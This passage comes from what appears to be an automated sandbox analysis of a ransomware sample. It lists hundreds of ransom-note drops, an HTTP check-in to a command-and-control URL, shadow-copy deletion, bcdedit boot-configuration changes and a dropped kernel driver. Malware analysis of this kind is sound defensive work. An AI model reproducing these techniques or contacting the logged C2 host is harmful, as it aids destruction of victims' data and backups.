Files\Java\jdk1.7.0_80\db\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\ProgramData\Microsoft Help\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Update\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\lib\deploy\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\playlist\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\plugins\access\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Extensions\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Update\Install\{C2992E49-2AEA-49C3-A145-FACF92F54BB3}\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\All Users\Microsoft\MF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\db\lib\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\lib\zi\Atlantic\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\modules\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\uk\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Protect\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Public\Documents\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\2ulz21c5.default-release\OfflineCache\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\lt\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\wasm\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\tet\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2ulz21c5.default-release\storage\permanent\chrome\idb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\bin\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\km\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Public\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2ulz21c5.default-release\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\db\bin\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\ProgramData\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\vcRuntimeMinimum_amd64\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Public\Recorded TV\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Public\Recorded TV\Sample Media\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\Favorites\Windows Live\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\sd\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\WidevineCdm\_platform_specific\win_x64\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\art\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\skins\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ja\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Mozilla Firefox\uninstall\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\lib\zi\Asia\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Javascripts\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\locale\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\hrtfs\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Microsoft Sync Framework\v1.0\Runtime\x64\resources\1033\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\kn\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Adobe\Color\Profiles\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zalsryvg.Admin\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Public\Videos\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\Favorites\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\pa\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Local Storage\leveldb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\lib\zi\America\Indiana\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Mozilla Firefox\defaults\pref\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Mozilla Firefox\browser\features\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe HTTP URL 10 http://sec.timerz.org/addrecord.php?apikey=drsc_api_key&compuser=ELJKIHEZ|Admin&sid=oBmyzS1XOfT4SR34&phase=[FIN]49E80ECBA8F3CD9C|3304|53|3357 Process not Found File created C:\Recovery\19050942-cd11-11ea-8b14-46f8a7600ebe\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\Cache\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\4AO3J8KQ\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\Contacts\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Public\Downloads\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\nb\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 1516 bcdedit.exe 1868 bcdedit.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\system32\Drivers\PROCEXP152.SYS V779npJ764.exe -
Executes dropped EXE 359 IoCs
pid Process 1488 NWs0428A.exe 560 V779npJ7.exe 1228 V779npJ764.exe 1092 V779npJ7.exe 1040 V779npJ7.exe 1876 V779npJ7.exe 1956 V779npJ7.exe 856 V779npJ7.exe 1744 V779npJ7.exe 1212 V779npJ7.exe 2004 V779npJ7.exe 672 V779npJ7.exe 1152 V779npJ7.exe 608 V779npJ7.exe 1056 V779npJ7.exe 1372 V779npJ7.exe 864 V779npJ7.exe 1836 V779npJ7.exe 1668 V779npJ7.exe 1992 V779npJ7.exe 316 V779npJ7.exe 996 V779npJ7.exe 1076 V779npJ7.exe 1792 V779npJ7.exe 1872 V779npJ7.exe 1144 V779npJ7.exe 928 V779npJ7.exe 1796 V779npJ7.exe 1008 V779npJ7.exe 1668 V779npJ7.exe 1756 V779npJ7.exe 240 V779npJ7.exe 1392 V779npJ7.exe 1008 V779npJ7.exe 1276 V779npJ7.exe 1756 V779npJ7.exe 888 V779npJ7.exe 904 V779npJ7.exe 1956 V779npJ7.exe 1756 V779npJ7.exe 1052 V779npJ7.exe 1212 V779npJ7.exe 532 V779npJ7.exe 568 V779npJ7.exe 888 V779npJ7.exe 828 V779npJ7.exe 1480 V779npJ7.exe 948 V779npJ7.exe 1052 V779npJ7.exe 1688 V779npJ7.exe 1464 V779npJ7.exe 1676 V779npJ7.exe 1548 V779npJ7.exe 1068 V779npJ7.exe 828 V779npJ7.exe 1376 V779npJ7.exe 568 V779npJ7.exe 792 V779npJ7.exe 968 V779npJ7.exe 240 V779npJ7.exe 1348 V779npJ7.exe 1144 V779npJ7.exe 796 V779npJ7.exe 1972 V779npJ7.exe 928 V779npJ7.exe 1560 V779npJ7.exe 208 V779npJ7.exe 1800 V779npJ7.exe 1152 V779npJ7.exe 968 V779npJ7.exe 316 V779npJ7.exe 1348 V779npJ7.exe 2008 V779npJ7.exe 1740 V779npJ7.exe 1972 V779npJ7.exe 712 V779npJ7.exe 1976 V779npJ7.exe 1120 V779npJ7.exe 796 V779npJ7.exe 968 V779npJ7.exe 1500 V779npJ7.exe 2008 V779npJ7.exe 1176 V779npJ7.exe 316 V779npJ7.exe 712 V779npJ7.exe 224 V779npJ7.exe 1052 V779npJ7.exe 1376 V779npJ7.exe 316 V779npJ7.exe 1076 V779npJ7.exe 1092 V779npJ7.exe 568 V779npJ7.exe 1740 V779npJ7.exe 1480 